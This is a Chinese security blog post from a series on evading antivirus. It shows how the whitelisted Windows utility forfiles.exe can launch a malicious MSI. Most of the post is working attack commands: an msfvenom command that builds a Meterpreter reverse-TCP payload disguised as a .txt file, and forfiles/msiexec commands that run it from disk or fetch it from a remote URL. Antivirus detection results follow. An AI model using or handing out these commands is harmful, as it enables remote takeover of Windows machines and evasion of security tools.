远控免杀专题(60)-白名单Forfiles.exe执行payload

admin 2025年1月11日13:30:42评论4 views字数 965阅读3分13秒阅读模式
 

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

一、Forfiles.exe介绍

Forfiles是一款windows平台默认安装的文件操作搜索工具之一,可以通过文件名称,修改日期等条件选择文件并运行一个命令来操作文件。它可以直接在命令行中使用,也可以在批处理文件或其他脚本中使用。

微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11

默认安装位置:

C:WINDOWSsystem32forfiles.exeC:WINDOWSSysWOW64forfiles.exe

说明:Forfiles.exe所在路径已被系统添加PATH环境变量中,因此,Forfiles命令可识别,需注意x86,x64位的Forfiles调用。

远控免杀专题(60)-白名单Forfiles.exe执行payload

二、利用Forfiles.exe执行payload

使用msfvenom生成msi文件,指定后缀为txt。

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.16.100.207 LPORT=4444 -f msi > TIDE.txt

远控免杀专题(60)-白名单Forfiles.exe执行payload

移动到靶机上执行命令运行

forfiles /p c:windowssystem32 /m cmd.exe /c "msiexec.exe /q /i C:UsersadministratorDesktopTIDE.txt"

远控免杀专题(60)-白名单Forfiles.exe执行payload

成功上线。

远控免杀专题(60)-白名单Forfiles.exe执行payload

还可以通过远程访问的形式执行,同样可以成功上线。

forfiles /p c:windowssystem32 /m cmd.exe /c "msiexec.exe / q /i http://127.0.0.1/TIDE.txt"

远控免杀专题(60)-白名单Forfiles.exe执行payload

远控免杀专题(60)-白名单Forfiles.exe执行payload

打开杀软进行测试。360杀毒,360安全卫士,和火绒都报毒。

远控免杀专题(60)-白名单Forfiles.exe执行payload

vt查杀率34/60

远控免杀专题(60)-白名单Forfiles.exe执行payload

三、参考资料

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/84_基于白名单Forfiles执行payload第十四季.html

原文始发于微信公众号(白帽子):远控免杀专题(60)-白名单Forfiles.exe执行payload

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日13:30:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   远控免杀专题(60)-白名单Forfiles.exe执行payloadhttps://cn-sec.com/archives/1211175.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息